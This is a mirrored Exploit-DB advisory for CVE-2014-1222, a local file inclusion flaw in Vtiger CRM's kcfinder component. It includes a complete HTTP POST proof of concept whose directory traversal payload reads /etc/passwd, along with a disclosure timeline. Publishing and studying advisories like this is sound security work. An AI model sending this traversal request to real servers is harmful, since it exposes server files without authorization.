bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/32213.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

46 lines
No EOL
1.8 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

CVE: CVE-2014-1222
Vendor: Vtiger
Product: CRM
Affected version: Vtiger 5.4.0, 6.0 RC & 6.0.0 GA
Fixed version: Vtiger 6.0.0 Security patch 1
Reported by: Jerzy Kramarz
Details:
A local file inclusion vulnerability was discovered in the kcfinder component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files.
The following request is a Proof-of-Concept for retrieving /etc/passwd file from remote system.
POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.56.103
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.56.103/vtigercrm6rc2/kcfinder/browse.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
dir=files&file=/../../../../../../../../../../../etc/passwd
Note: In order to exploit this vulnerability an attacker has to be authenticated.
Impact:
This vulnerability gives an attacker the ability to read local files from the server filesystem.
Exploit:
Exploit code is not required.
Vendor status:
23/12/2013 Advisory created
03/01/2014 Vendor contacted
14/01/2014 CVE obtained
27/01/2014 Vendor contact reattempted
10/02/2014 Vendor working on a fix
12/02/2014 Fix released
13/02/2014 Fix confirmed
11/03/2014 Published
Reference in a new issue View git blame Copy permalink